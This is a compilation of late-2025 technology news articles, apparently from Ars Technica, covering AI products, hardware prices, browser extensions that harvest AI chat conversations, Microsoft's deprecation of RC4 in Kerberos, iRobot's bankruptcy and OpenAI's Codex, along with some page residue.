Online fury erupted this week after an LG TV owner claimed that a firmware update installed unremovable generative AI software on their smart TV.
The controversy began on Saturday, when a Reddit user posted about the sudden appearance of a Microsoft Copilot icon on their device (something Windows users are all too familiar with). The Reddit user claimed that a “new software update installed Copilot” onto their LG TV and that it couldn’t be deleted.
“Pre-installed crap is universally dogshit. If I wanted it, I’d have installed it myself eventually. The whole reason it’s bundled is because no one would choose it… Burn your television,” another Reddit user responded in the thread, which has 36,000 upvotes as of this writing.
At this point, most competitive online multiplayer games on the PC come with some kind of kernel-level anti-cheat software. As we’ve written before, this is software that runs with more elevated privileges than most other apps and games you run on your PC, allowing it to load in earlier and detect advanced methods of cheating. More recently, anti-cheat software has started to require more Windows security features like Secure Boot, a TPM 2.0 module, and virtualization-based memory integrity protection.
Riot Games, best known for titles like Valorant and League of Legends and the Vanguard anti-cheat software, has often been one of the earliest to implement new anti-cheat requirements. There’s already a long list of checks that systems need to clear before they’ll be allowed to play Riot’s games online, and now the studio is announcing a new one: a BIOS update requirement that will be imposed on “certain players” following Riot’s discovery of a UEFI bug that could allow especially dedicated and motivated cheaters to circumvent certain memory protections.
In short, the bug affects the input-output memory management unit (IOMMU) “on some UEFI-based motherboards from multiple vendors.” One feature of the IOMMU is to protect system memory from direct access during boot by external hardware devices, which otherwise might manipulate the contents of your PC’s memory in ways that could enable cheating.
Google is generally happy to see people using generative AI tools to create content, and it’s doubly happy when they publish it on its platforms. But there are limits to everything. Two YouTube channels that attracted millions of subscribers with AI-generated movie trailers have been shuttered.
Screen Culture and KH Studio flooded the site with fake but often believable trailers. The channels, which had a combined audience of more than 2 million subscribers, became a thorn in Google’s side in early 2025 when other YouTubers began griping about their sudden popularity in the age of AI. The channels produced videos with titles like “GTA: San Andreas (2025) Teaser Trailer” and “Malcom In The Middle Reboot (2025) First Trailer.” Of course, neither of those projects exist, but that didn’t stop them from appearing in user feeds.
Google demonetized the channels in early 2025, forcing them to adopt language that made it clear they were not official trailers. The channels were able to monetize again, but the disclaimers were not consistently used. Indeed, many of the most popular videos from those channels in recent months included no “parody” or “concept trailer” disclosures. Now, visiting either channel’s page on YouTube produces an error reading, “This page isn’t available. Sorry about that. Try searching for something else.”
Peacock subscribers will see ads immediately upon opening the streaming app or website next year. It’s a bold new strategy for attracting advertisers—something that’s been increasingly important to subscription-based streaming services—but it also risks alienating viewers
As reported by Variety, the new type of ads will display on the profile selection page that shows when a subscriber launches Peacock. Starting next year, instead of the profile page just showing your different Peacock profiles, most of the page will be dominated by an advertorial image. The circles of NBCUniversal-owned characters selected for user profiles will be relegated to a vertical column on the screen’s left side, as you can see here.
To avoid seeing what NBCUniversal is calling “Arrival Ads” every time you open Peacock, you need to subscribe to Peacock’s most expensive plan, which is ad-free and starts at $17 per month (Peacock’s ad-based plans start at $8/month.)
The first few months of 2025 were full of graphics card reviews where we generally came away impressed with performance and completely at a loss on availability and pricing. The testing in these reviews is useful regardless, but when it came to extra buying advice, the best we could do was to compare Nvidia’s imaginary pricing to AMD’s imaginary pricing and wait for availability to improve.
Now, as the year winds down, we’re facing price spikes for memory and storage that are unlike anything I’ve seen in two decades of pricing out PC parts. Pricing for most RAM kits has increased dramatically since this summer, driven by overwhelming demand for these parts in AI data centers. Depending on what you’re building, it’s now very possible that the memory could be the single most expensive component you buy; things are even worse now than they were the last time we compared prices a few weeks ago.
| Component | Aug. 2025 price | Nov. 2025 price | Dec. 2025 price |
|---|---|---|---|
| Patriot Viper Venom 16GB (2 x 8GB) DDR-6000 | $49 | $110 | $189 |
| Western Digital WD Blue SN5000 500GB | $45 | $69 | $102* |
| Silicon Power 16GB (2 x 8GB) DDR4-3200 | $34 | $89 | $104 |
| Western Digital WD Blue SN5000 1TB | $64 | $111 | $135* |
| Team T-Force Vulcan 32GB DDR5-6000 | $82 | $310 | $341 |
| Western Digital WD Blue SN5000 2TB | $115 | $154 | $190* |
| Western Digital WD Black SN7100 2TB | $130 | $175 | $210 |
| Team Delta RGB 64GB (2 x 32GB) DDR5-6400 | $190 | $700 | $800 |
Some SSDs are getting to the point where they’re twice as expensive as they were this summer (for this comparison, I’ve swapped the newer WD Blue SN5100 pricing in for the SN5000, since the drive is both newer and slightly cheaper as of this writing). Some RAM kits, meanwhile, are around four times as expensive as they were in August. Yeesh.
New GPT Image 1.5 allows more detailed conversational image editing, for better or worse.
For most of photography’s roughly 200-year history, altering a photo convincingly required either a darkroom, some Photoshop expertise, or, at minimum, a steady hand with scissors and glue. On Tuesday, OpenAI released a tool that reduces the process to typing a sentence.
It’s not the first company to do so. While OpenAI had a conversational image-editing model in the works since GPT-4o in 2024, Google beat OpenAI to market in March with a public prototype, then refined it to a popular model called Nano Banana image model (and Nano Banana Pro). The enthusiastic response to Google’s image-editing model in the AI community got OpenAI’s attention.
OpenAI’s new GPT Image 1.5 is an AI image synthesis model that reportedly generates images up to four times faster than its predecessor and costs about 20 percent less through the API. The model rolled out to all ChatGPT users on Tuesday and represents another step toward making photorealistic image manipulation a casual process that requires no particular visual skills.
GPT Image 1.5 is notable because it’s a “native multimodal” image model, meaning image generation happens inside the same neural network that processes language prompts. (In contrast, DALL-E 3, an earlier OpenAI image generator previously built into ChatGPT, used a different technique called diffusion to generate images.)
This newer type of model, which we covered in more detail in March, treats images and text as the same kind of thing: chunks of data called “tokens” to be predicted, patterns to be completed. If you upload a photo of your dad and type “put him in a tuxedo at a wedding,” the model processes your words and the image pixels in a unified space, then outputs new pixels the same way it would output the next word in a sentence.
Using this technique, GPT Image 1.5 can more easily alter visual reality than earlier AI image models, changing someone’s pose or position, or rendering a scene from a slightly different angle, with varying degrees of success. It can also remove objects, change visual styles, adjust clothing, and refine specific areas while preserving facial likeness across successive edits. You can converse with the AI model about a photograph, refining and revising, the same way you might workshop a draft of an email in ChatGPT.
Fidji Simo, OpenAI’s CEO of applications, wrote in a blog post that ChatGPT’s chat interface was never designed for visual work. “Creating and editing images is a different kind of task and deserves a space built for visuals,” Simo wrote. To that end, OpenAI introduced a dedicated image creation space in ChatGPT’s sidebar with preset filters and trending prompts.
The release’s timing seems like a direct response to Google’s technical gains in AI, including a massive growth in chatbot user base. In particular, Google’s Nano Banana image model (and Nano Banana Pro) became popular on social media after its August release, thanks to its ability to render text relatively clearly and preserve faces consistently across edits.
OpenAI’s previous token-based image synthesis model could make some targeted edits based on conversational prompts, but it often changed facial details and other elements that users might have wanted to keep. GPT Image 1.5 appears designed to match the editing features that Google already shipped. But if you happen to prefer the older ChatGPT image generator, OpenAI says the previous version will remain available as a custom GPT (for now) for users who prefer it.
GPT Image 1.5 is not perfect. In our brief testing, it didn’t always follow prompting directions very well. But when it does work, the results seem more convincing and detailed than OpenAI’s previous multimodal image model. For a more detailed comparison, a software consultant named Shaun Pedicini has put together an instructive site (“GenAI Image Editing Showdown”) that conducts A/B testing of various AI image models.
And while we’ve written about this a lot over the past few years, it’s probably worth repeating that barriers to realistic photo editing and manipulation keep dropping. This kind of seamless, realistic, effortless AI image manipulation may prompt (pun intended) a cultural recalibration of what visual images mean to society. It can also feel a little scary, for someone who grew up in an earlier media era, to see yourself put into situations that didn’t really happen.
For most of photography’s history, a convincing forgery required skill, time, and resources. Those barriers made fakery rare enough that we could treat many photographs as a reasonable proxy for truth, although they could be manipulated (and often were). That era has ended due to AI, but GPT Image 1.5 seems to remove yet more of the remaining friction.
The capability to preserve facial likeness across edits has obvious utility for legitimate photo editing and equally obvious potential for misuse. Image generators have already been used to create non-consensual intimate imagery and impersonate real people.
With those hazards in mind, OpenAI’s image generators have always included a filter that usually blocks sexual or violent outputs. But it’s still possible to create embarrassing images of people without their consent (even though it violates OpenAI’s terms of service) while avoiding those topics. The company says generated images include C2PA metadata identifying them as AI-created, though that data can be stripped by resaving the file.
Speaking of fakes, text rendering has been a long-standing weakness in image generators that has slowly gotten better. By prompting some older image synthesis models to create a sign or poster with specific words, the results often come back garbled or misspelled.
OpenAI says GPT Image 1.5 can handle denser and smaller text. The company’s blog post includes a demonstration where the model generated an image of a newspaper with a multi-paragraph article, complete with headlines, a byline, benchmark tables, and body text that remains legible at the paragraph level. Whether this holds up across varied prompts will require broader testing.
While the newspaper in the example looks fake now, it’s another step toward the potential erosion of the public’s perception of the pre-Internet historical record as image synthesis becomes more realistic.
OpenAI acknowledged in its blog post that the new model still has problems, including limited support for certain drawing styles and mistakes when generating images that require scientific accuracy. But they think it will get better over time. “We believe we’re still at the beginning of what image generation can enable,” the company wrote. And if the past three years of progress in image synthesis are any indication, they may be correct.
Benj Edwards
Senior AI Reporter
Benj Edwards
Senior AI Reporter
The extensions, available for Chromium browsers, harvest full AI conversations over months.
Credit:
Getty Images
Credit:
Getty Images
Story text
Size
Small
Standard
Large
Width
*
Standard
Wide
Links
Standard
Orange
* Subscribers onlyBrowser extensions with more than 8 million installs are harvesting complete and extended conversations from users’ AI conversations and selling them for marketing purposes, according to data collected from the Google and Microsoft pages hosting them.
Security firm Koi discovered the eight extensions, which as of late Tuesday night remained available in both Google’s and Microsoft’s extension stores. Seven of them carry “Featured” badges, which are endorsements meant to signal that the companies have determined the extensions meet their quality standards. The free extensions provide functions such as VPN routing to safeguard online privacy and ad blocking for ad-free browsing. All provide assurances that user data remains anonymous and isn’t shared for purposes other than their described use.
An examination of the extensions’ underlying code tells a much more complicated story. Each contains eight of what Koi calls “executor” scripts, with each being unique for ChatGPT, Claude, Gemini, and five other leading AI chat platforms. The scripts are injected into webpages anytime the user visits one of these platforms. From there, the scripts override browsers’ built-in functions for making network requests and receiving responses.
As a result, all interaction between the browser and the AI bots is routed not by the legitimate browser APIs—in this case fetch() and HttpRequest—but through the executor script. The extensions eventually compress the data and send it to endpoints belonging to the extension maker.
“By overriding the [browser APIs], the extension inserts itself into that flow and captures a copy of everything before the page even displays it,” Koi CTO Idan Dardikman wrote in an email. “The consequence: The extension sees your complete conversation in raw form—your prompts, the AI’s responses, timestamps, everything—and sends a copy to their servers.”
Besides ChatGPT, Claude, and Gemini, the extensions harvest all conversations from Copilot, Perplexity, DeepSeek, Grok, and Meta AI. Koi said the full description of the data captured includes:
The executor script runs independently from the VPN networking, ad blocking, or other core functionality. That means that even when a user toggles off VPN networking, AI protection, ad blocking, or other functions, the conversation collection continues. The only way to stop the harvesting is to disable the extension in the browser settings or to uninstall it.
Koi said it first discovered the conversation harvesting in Urban VPN Proxy, a VPN routing extension that lists “AI protection” as one of its benefits. The data collection began in early July with the release of version 5.5.0.
“Anyone who used ChatGPT, Claude, Gemini, or the other targeted platforms while Urban VPN was installed after July 9, 2025 should assume those conversations are now on Urban VPN’s servers and have been shared with third parties,” the company said. “Medical questions, financial details, proprietary code, personal dilemmas—all of it, sold for ‘marketing analytics purposes.'”
Following that discovery, the security firm uncovered seven additional extensions with identical AI harvesting functionality. Four of the extensions are available in the Chrome Web Store. The other four are on the Edge add-ons page. Collectively, they have been installed more than 8 million times.
They are:
Chrome Store
Edge Add-ons:
The extensions come with conflicting messages about how they handle bot conversations, which often contain deeply personal information about users’ physical and mental health, finances, personal relationships, and other sensitive information that could be a gold mine for marketers and data brokers. The Urban VPN Proxy in the Chrome Web Store, for instance, lists “AI protection” as a benefit. It goes on to say:
Our VPN provides added security features to help shield your browsing experience from phishing attempts, malware, intrusive ads and AI protection which checks prompts for personal data (like an email or phone number), checks AI chat responses for suspicious or unsafe links and displays a warning before click or submit your prompt.
On the privacy policy for the extension, Google says the developer has declared that user data isn’t sold to third parties outside of approved use cases and won’t be “used or transferred for purposes that are unrelated to the item’s core functionality.” The page goes on to list the personal data handled as location, web history, and website content.
Koi said that a consent prompt that the extensions display during setup notifies the user that they process “ChatAI communication,” “pages you visit,” and “security signals.” The notification goes on to say that the data is processed to “provide these protections,” which presumably means the core functions such as VPN routing or ad blocking.
The only explicit mention of AI conversations being harvested is in legalese buried in the privacy policy, such as this 6,000-word one for Urban VPN Proxy, posted on each extension website. There, it says that the extension will “collect the prompts and outputs queried by the End-User or generated by the AI chat provider, as applicable.” It goes on to say that the extension developer will “disclose the AI prompts for marketing analytics purposes.”
All eight extensions and the privacy policies covering them are developed and written by Urban Cyber Security, a company that says its apps and extensions are used by 100 million people. The policies say the extensions share “Web Browsing Data” with “our affiliated company,” which is listed as both BiScience and B.I Science. The affiliated company “uses this raw data and creates insights which are commercially used and shared with Business Partners.” The policy goes on to refer users to the BiScience privacy policy. BiScience, whose privacy practices have been scrutinized before, says its services “transform enormous volumes of digital signals into clear, actionable market intelligence.”
It’s hard to fathom how both Google and Microsoft would allow such extensions onto their platforms at all, let alone go out of their way to endorse seven of them with a featured badge. Neither company returned emails asking how they decide which extensions qualify for such a distinction, if they have plans to stop making them available to Chrome and Edge users, or why the privacy policies are so unclear to normal users.
Messages sent to both individual extension developers and Urban Cyber Security went unanswered. BiScience provides no email. A call to the company’s New York office was answered by someone who said they were in Israel and to call back during normal business hours in that country.
Koi’s discovery is the latest cautionary tale illustrating the growing perils of being online. It’s questionable in the first place whether people should trust their most intimate secrets and sensitive business information to AI chatbots, which come with no HIPAA assurances, attorney-client privilege, or expectations of privacy. Yet increasingly, that’s exactly what AI companies are encouraging, and users, it seems, are more than willing to comply.
Compounding the risk is the rush to install free apps and extensions—particularly those from little-known developers and providing at best minimal benefits—on devices storing and transmitting these chats. Taken together, they’re a recipe for disaster, and that’s exactly what we have here.
Dan Goodin
Senior Security Editor
Dan Goodin
Senior Security Editor
Apple doesn’t like to talk about its upcoming products before it’s ready, but sometimes the company’s software does the talking for it. So far this week we’ve had a couple of software-related leaks that have outed products Apple is currently testing—one a pre-release build of iOS 26, and the other some leaked files from a kernel debug kit (both via MacRumors).
Most of the new devices referenced in these leaks are straightforward updates to products that already exist: a new Apple TV, a HomePod mini 2, new AirTags and AirPods, an M4 iPad Air, a 12th-generation iPad to replace the current A16 version, next-generation iPhones (including the 17e, 18, and the rumored foldable model), a new Studio Display model, some new smart home products we’ve already heard about elsewhere, and M5 updates for the MacBook Air, Mac mini, Mac Studio, and the other MacBook Pros. There’s also yet another reference to the lower-cost MacBook that Apple is apparently planning to replace the M1 MacBook Air it still sells via Walmart for $599.
For power users, though, the most interesting revelation might be that Apple is working on a higher-end Apple Silicon iMac powered by an M5 Max chip. The kernel debug kit references an iMac with the internal identifier J833c, based on a platform identified as H17C—and H17C is apparently based on the M5 Max, rather than a lower-end M5 chip. (For those who don’t have Apple’s branding memorized, “Max” is associated with Apple’s second-fastest chips; the M5 Max would be faster than the M5 or M5 Pro, but slower than the rumored M5 Ultra.)
Dictionary codifies the term that took hold in 2024 for low-quality AI-generated content.
Story text
Size
Small
Standard
Large
Width
*
Standard
Wide
Links
Standard
Orange
* Subscribers onlyLike most tools, generative AI models can be misused. And when the misuse gets bad enough that a major dictionary notices, you know it’s become a cultural phenomenon.
On Sunday, Merriam-Webster announced that “slop” is its 2025 Word of the Year, reflecting how the term has become shorthand for the flood of low-quality AI-generated content that has spread across social media, search results, and the web at large. The dictionary defines slop as “digital content of low quality that is produced usually in quantity by means of artificial intelligence.”
“It’s such an illustrative word,” Merriam-Webster president Greg Barlow told the Associated Press. “It’s part of a transformative technology, AI, and it’s something that people have found fascinating, annoying, and a little bit ridiculous.”
To select its Word of the Year, Merriam-Webster’s editors review data on which words rose in search volume and usage, then reach consensus on which term best captures the year. Barlow told the AP that the spike in searches for “slop” reflects growing awareness among users that they are encountering fake or shoddy content online.
Dictionaries have been tracking AI’s impact on language for the past few years, with Cambridge having selected “hallucinate” as its 2023 word of the year due to the tendency of AI models to generate plausible-but-false information (long-time Ars readers will be happy to hear there’s another word term for that in the dictionary as well).
The trend extends to online culture in general, which is ripe with new coinages. This year, Oxford University Press chose “rage bait,” referring to content designed to provoke anger for engagement. Cambridge Dictionary selected “parasocial,” describing one-sided relationships between fans and celebrities or influencers.
As the AP points out, the word “slop” originally entered English in the 1700s to mean soft mud. By the 1800s, it had evolved to describe food waste fed to pigs, and eventually came to mean rubbish or products of little value. The new AI-related definition builds on that history of describing something unwanted and unpleasant.
Although he didn’t coin the term “AI slop,” independent AI researcher Simon Willison helped document its rise in May 2024 when he wrote on his blog comparing it to how “spam” had previously become the word for unwanted email. Quoting a tweet from an X user named @deepfates, Willison showed that the “AI slop” term began circulating in online communities shortly before he wrote his post advocating for its use.
The “slop” term carries a dismissive tone that sets it clearly apart from prominent corporate hype language about the promises and even existential perils of AI. “In 2025, amid all the talk about AI threats, slop set a tone that’s less fearful, more mocking,” Merriam-Webster wrote in a blog post. “The word sends a little message to AI: when it comes to replacing human creativity, sometimes you don’t seem too superintelligent.”
In its blog post announcing the word of the year selection, Merriam-Webster noted that 2025 saw a flood of AI-generated videos, off-kilter advertising images, propaganda, fake news, AI-written books, and what it called “workslop,” referring to reports that waste coworkers’ time. Ars Technica has covered similar phenomena invading various fields, including using the term “hiring slop” to describe an overflow of AI-generated résumés in June.
While some AI critics relish dismissing all generated output as “slop,” there’s some subjective nuance about what earns the label. As former Evernote CEO Phil Libin told Axios in April, the distinction may come down to intention: “When AI is used to produce mediocre things with less effort than it would have taken without AI, it’s slop. When it’s used to make something better than it could have been made without AI, it’s a positive augmentation.”
Willison had his own nuanced take, since he’s a proponent of using AI responsibly as tools to help with tasks like programming, but not with spamming. “Not all promotional content is spam, and not all AI-generated content is slop,” he wrote in May 2024 when discussing the term. “But if it’s mindlessly generated and thrust upon someone who didn’t ask for it, slop is the perfect term for it.”
Benj Edwards
Senior AI Reporter
Benj Edwards
Senior AI Reporter
The weak RC4 for administrative authentication has been a hacker holy grail for decades.
Microsoft is killing off an obsolete and vulnerable encryption cipher that Windows has supported by default for 26 years following more than a decade of devastating hacks that exploited it and recently faced blistering criticism from a prominent US senator.
When the software maker rolled out Active Directory in 2000, it made RC4 a sole means of securing the Windows component, which administrators use to configure and provision fellow administrator and user accounts inside large organizations. RC4, short for Rivist Cipher 4, is a nod to mathematician and cryptographer Ron Rivest of RSA Security, who developed the stream cipher in 1987. Within days of the trade-secret-protected algorithm being leaked in 1994, a researcher demonstrated a cryptographic attack that significantly weakened the security it had been believed to provide. Despite the known susceptibility, RC4 remained a staple in encryption protocols, including SSL and its successor TLS, until about a decade ago.
One of the most visible holdouts in supporting RC4 has been Microsoft. Eventually, Microsoft upgraded Active Directory to support the much more secure AES encryption standard. But by default, Windows servers have continued to respond to RC4-based authentication requests and return an RC4-based response. The RC4 fallback has been a favorite weakness hackers have exploited to compromise enterprise networks. Use of RC4 played a key role in last year’s breach of health giant Ascension. The breach caused life-threatening disruptions at 140 hospitals and put the medical records of 5.6 million patients into the hands of the attackers. US Senator Ron Wyden (D-Ore.) in September called on the Federal Trade Commission to investigate Microsoft for “gross cybersecurity negligence,” citing the continued default support for RC4.
Last week, Microsoft said it was finally deprecating RC4 and cited its susceptibility to Kerberoasting, the form of attack, known since 2014, that was the root cause of the initial intrusion into Ascension’s network.
“By mid-2026, we will be updating domain controller defaults for the Kerberos Key Distribution Center (KDC) on Windows Server 2008 and later to only allow AES-SHA1 encryption,” Matthew Palko, a Microsoft principal program manager, wrote. “RC4 will be disabled by default and only used if a domain administrator explicitly configures an account or the KDC to use it.”
AES-SHA1, an algorithm widely believed to be secure, has been available in all supported Windows versions since the roll out of Windows Server 2008. Since then, Windows clients by default authenticated using the much more secure standard, and servers responded using the same. But, Windows servers, also by default, respond to RC4-based authentication requests and returned an RC4-based response, leaving networks open to Kerberoasting.
Following next year’s change, RC4 authentication will no longer function unless administrators perform the extra work to allow it. In the meantime, Palko said, it’s crucial that admins identify any systems inside their networks that rely on the cipher. Despite the known vulnerabilities, RC4 remains the sole means of some third-party legacy systems for authenticating to Windows networks. These systems can often go overlooked in networks even though they are required for crucial functions.
To streamline the identification of such systems, Microsoft is making several tools available. One is an update to KDC logs that will track both requests and responses that systems make using RC4 when performing requests through Kerberos. Kerberos is an industry-wide authentication protocol for verifying the identities of users and services over a non-secure network. It’s the sole means for mutual authentication to Active Directory, which hackers attacking Windows networks widely consider a Holy Grail because of the control they gain once it has been compromised.
Microsoft is also introducing new PowerShell scripts to sift through security event logs to more easily pinpoint problematic RC4 usage.
Microsoft said it has steadily worked over the past decade to deprecate RC4, but that the task wasn’t easy.
“The problem though is that it’s hard to kill off a cryptographic algorithm that is present in every OS that’s shipped for the last 25 years and was the default algorithm for so long, Steve Syfuhs, who runs Microsoft’s Windows Authentication team, wrote on Bluesky. “See,” he continued, “the problem is not that the algorithm exists. The problem is how the algorithm is chosen, and the rules governing that spanned 20 years of code changes.”
Over those two decades, developers discovered a raft of critical RC4 vulnerabilities that required “surgical” fixes. Microsoft considered deprecating RC4 by this year, but ultimately “punted” after discovering vulnerabilities that required still more fixes. During that time Microsoft introduced some “minor improvements” that favored the use of AES, and as a result, usage dropped by “orders of magnitude.”
“Within a year we had observed RC4 usage drop to basically nil. This is not a bad thing and in fact gave us a lot more flexibility to kill it outright because we knew it genuinely wasn’t going to break folks, because folks weren’t using it.”
Syfuhs went on to document additional challenges Microsoft encountered and the approach it took to solving them.
While RC4 has known cipher weaknesses that make it insecure, Kerberoasting exploits a separate weakness. As implemented in Active Directory authentication, it uses no cryptographic salt and a single round of the MD4 hashing function. Salt is a technique that adds random input to each password before it is hashed. That requires hackers to invest considerable time and resources into cracking the hash. MD4, meanwhile, is a fast algorithm that requires modest resources. Microsoft’s implementation of AES-SHA1 is much slower and iterates the hash to further slow down cracking efforts. Taken together, AES-Sha1-hashed passwords require about 1,000 times the time and resources to be cracked.
Windows admins would do well to audit their networks for any usage of RC4. Given its wide adoption and continued use industry-wide, it may still be active, much to the surprise and chagrin of those charged with defending against hackers.
Dan Goodin
Senior Security Editor
Dan Goodin
Senior Security Editor
Google began offering “dark web reports” a while back, but the company has just announced the feature will be going away very soon. In an email to users of the service, Google says it will stop telling you about dark web data leaks in February. This probably won’t negatively impact your security or privacy because, as Google points out in its latest email, there’s really nothing you can do about the dark web.
The dark web reports launched in March 2023 as a perk for Google One subscribers. The reports were expanded to general access in 2024. Now, barely a year later, Google has decided it doesn’t see the value in this type of alert for users. Dark web reports provide a list of partially redacted user data retrieved from shadowy forums and sites where such information is bought and sold. However, that’s all it is—a list.
The dark web consists of so-called hidden services hosted inside the Tor network. You need a special browser or connection tools in order to access Tor hidden services, and its largely anonymous nature has made it a favorite hangout for online criminals. If a company with your personal data has been hacked, that data probably lives somewhere on the dark web.
Shenzhen-based Picea Robotics, its lender and primary supplier, will acquire all of iRobot’s shares.
Credit:
Onfokus
Credit:
Onfokus
Story text
Size
Small
Standard
Large
Width
*
Standard
Wide
Links
Standard
Orange
* Subscribers onlyRoomba maker iRobot has filed for bankruptcy and will be taken over by its Chinese supplier after the company that popularized the robot vacuum cleaner fell under the weight of competition from cheaper rivals.
The US-listed group on Sunday said it had filed for Chapter 11 bankruptcy in Delaware as part of a restructuring agreement with Shenzhen-based Picea Robotics, its lender and primary supplier, which will acquire all of iRobot’s shares.
The deal comes nearly two years after a proposed $1.5 billion acquisition by Amazon fell through over competition concerns from EU regulators.
Shares in iRobot traded at about $4 a share on Friday, well below the $52 a share offered by Amazon.
“Today’s announcement marks a pivotal milestone in securing iRobot’s long-term future,” said Gary Cohen, iRobot’s chief executive. “The transaction will strengthen our financial position and will help deliver continuity for our consumers, customers and partners.”
Founded in 1990 by engineers from the Massachusetts Institute of Technology, iRobot helped introduce robotics into the home, ultimately selling more than 40 million devices, including its Roomba vacuum cleaner, according to the company.
In recent years, it has faced competition from cheaper Chinese rivals, including Picea, putting pressure on sales and forcing iRobot to reduce headcount. A management shake-up in early 2024 saw the departure of its co-founder as chief executive.
Amazon proposed buying the company in 2023, seeing synergy with its Alexa-powered smart speakers and Ring doorbells.
EU regulators, however, pushed back on the deal, raising concerns it would lead to reduced visibility for rival vacuum cleaner brands on Amazon’s website.
Amazon and iRobot terminated the deal little more than a month after Adobe’s $10 billion purchase of design software maker Figma was abandoned amid heightened US antitrust scrutiny under Joe Biden’s administration.
Although iRobot received $94 million in compensation for the termination of its deal with Amazon, a significant portion was used to pay advisory fees and repay part of a $200 million loan from private equity group Carlyle.
Picea’s Hong Kong subsidiary acquired the remaining $191 million of debt from Carlyle last month. At the time, iRobot already owed Picea $161.5 million for manufacturing services, nearly $91 million of which was overdue.
Alvarez & Marsal is serving as iRobot’s investment banker and financial adviser. The company is receiving legal advice from Paul, Weiss, Rifkind, Wharton & Garrison.
© 2025 The Financial Times Ltd. All rights reserved. Not to be redistributed, copied, or modified in any way.
“The vast majority of Codex is built by Codex,” OpenAI told us about its new AI coding agent.
Credit:
Mininyx Doodle via Getty Images
Credit:
Mininyx Doodle via Getty Images
Story text
Size
Small
Standard
Large
Width
*
Standard
Wide
Links
Standard
Orange
* Subscribers onlyWith the popularity of AI coding tools rising among software developers, their adoption has begun to touch every aspect of the process, including the improvement of AI coding tools themselves.
In interviews with Ars Technica this week, OpenAI employees revealed the extent to which the company now relies on its own AI coding agent, Codex, to build and improve the development tool. “I think the vast majority of Codex is built by Codex, so it’s almost entirely just being used to improve itself,” said Alexander Embiricos, product lead for Codex at OpenAI, in a conversation on Tuesday.
Codex, which OpenAI launched in its modern incarnation as a research preview in May 2025, operates as a cloud-based software engineering agent that can handle tasks like writing features, fixing bugs, and proposing pull requests. The tool runs in sandboxed environments linked to a user’s code repository and can execute multiple tasks in parallel. OpenAI offers Codex through ChatGPT’s web interface, a command-line interface (CLI), and IDE extensions for VS Code, Cursor, and Windsurf.
The “Codex” name itself dates back to a 2021 OpenAI model based on GPT-3 that powered GitHub Copilot’s tab completion feature. Embiricos said the name is rumored among staff to be short for “code execution.” OpenAI wanted to connect the new agent to that earlier moment, which was crafted in part by some who have left the company.
“For many people, that model powering GitHub Copilot was the first ‘wow’ moment for AI,” Embiricos said. “It showed people the potential of what it can mean when AI is able to understand your context and what you’re trying to do and accelerate you in doing that.”
It’s no secret that the current command-line version of Codex bears some resemblance to Claude Code, Anthropic’s agentic coding tool that launched in February 2025. When asked whether Claude Code influenced Codex’s design, Embiricos parried the question but acknowledged the competitive dynamic. “It’s a fun market to work in because there’s lots of great ideas being thrown around,” he said. He noted that OpenAI had been building web-based Codex features internally before shipping the CLI version, which arrived after Anthropic’s tool.
OpenAI’s customers apparently love the command line version, though. Embiricos said Codex usage among external developers jumped 20 times after OpenAI shipped the interactive CLI extension alongside GPT-5 in August 2025. On September 15, OpenAI released GPT-5 Codex, a specialized version of GPT-5 optimized for agentic coding, which further accelerated adoption.
It hasn’t just been the outside world that has embraced the tool. Embiricos said the vast majority of OpenAI’s engineers now use Codex regularly. The company uses the same open-source version of the CLI that external developers can freely download, suggest additions to, and modify themselves. “I really love this about our team,” Embiricos said. “The version of Codex that we use is literally the open source repo. We don’t have a different repo that features go in.”
The recursive nature of Codex development extends beyond simple code generation. Embiricos described scenarios where Codex monitors its own training runs and processes user feedback to “decide” what to build next. “We have places where we’ll ask Codex to look at the feedback and then decide what to do,” he said. “Codex is writing a lot of the research harness for its own training runs, and we’re experimenting with having Codex monitoring its own training runs.” OpenAI employees can also submit a ticket to Codex through project management tools like Linear, assigning it tasks the same way they would assign work to a human colleague.
This kind of recursive loop, of using tools to build better tools, has deep roots in computing history. Engineers designed the first integrated circuits by hand on vellum and paper in the 1960s, then fabricated physical chips from those drawings. Those chips powered the computers that ran the first electronic design automation (EDA) software, which in turn enabled engineers to design circuits far too complex for any human to draft manually. Modern processors contain billions of transistors arranged in patterns that exist only because software made them possible. OpenAI’s use of Codex to build Codex seems to follow the same pattern: each generation of the tool creates capabilities that feed into the next.
But describing what Codex actually does presents something of a linguistic challenge. At Ars Technica, we try to reduce anthropomorphism when discussing AI models as much as possible while also describing what these systems do using analogies that make sense to general readers. People can talk to Codex like a human, so it feels natural to use human terms to describe interacting with it, even though it is not a person and simulates human personality through statistical modeling.
The system runs many processes autonomously, addresses feedback, spins off and manages child processes, and produces code that ships in real products. OpenAI employees call it a “teammate” and assign it tasks through the same tools they use for human colleagues. Whether the tasks Codex handles constitute “decisions” or sophisticated conditional logic smuggled through a neural network depends on definitions that computer scientists and philosophers continue to debate. What we can say is that a semi-autonomous feedback loop exists: Codex produces code under human direction, that code becomes part of Codex, and the next version of Codex produces different code as a result.
According to our interviews, the most dramatic example of Codex’s internal impact came from OpenAI’s development of the Sora Android app. According to Embiricos, the development tool allowed the company to create the app in record time.
“The Sora Android app was shipped by four engineers from scratch,” Embiricos told Ars. “It took 18 days to build, and then we shipped it to the app store in 28 days total,” he said. The engineers already had the iOS app and server-side components to work from, so they focused on building the Android client. They used Codex to help plan the architecture, generate sub-plans for different components, and implement those components.
Despite OpenAI’s claims of success with Codex in house, it’s worth noting that independent research has shown mixed results for AI coding productivity. A METR study published in July found that experienced open source developers were actually 19 percent slower when using AI tools on complex, mature codebases—though the researchers noted AI may perform better on simpler projects.
Ed Bayes, a designer on the Codex team, described how the tool has changed his own workflow. Bayes said Codex now integrates with project management tools like Linear and communication platforms like Slack, allowing team members to assign coding tasks directly to the AI agent. “You can add Codex, and you can basically assign issues to Codex now,” Bayes told Ars. “Codex is literally a teammate in your workspace.”
This integration means that when someone posts feedback in a Slack channel, they can tag Codex and ask it to fix the issue. The agent will create a pull request, and team members can review and iterate on the changes through the same thread. “It’s basically approximating this kind of coworker and showing up wherever you work,” Bayes said.
For Bayes, who works on the visual design and interaction patterns for Codex’s interfaces, the tool has enabled him to contribute code directly rather than handing off specifications to engineers. “It kind of gives you more leverage. It enables you to work across the stack and basically be able to do more things,” he said. He noted that designers at OpenAI now prototype features by building them directly, using Codex to handle the implementation details.
OpenAI’s approach treats Codex as what Bayes called “a junior developer” that the company hopes will graduate into a senior developer over time. “If you were onboarding a junior developer, how would you onboard them? You give them a Slack account, you give them a Linear account,” Bayes said. “It’s not just this tool that you go to in the terminal, but it’s something that comes to you as well and sits within your team.”
